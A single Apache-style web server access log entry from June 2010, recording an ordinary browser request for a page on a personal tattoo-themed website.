174.29.169.112 - - [06/Jun/2010:22:16:51 -0500] "GET /tattoo/bonus.htm HTTP/1.1" 200 808 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 FBSMTWB"
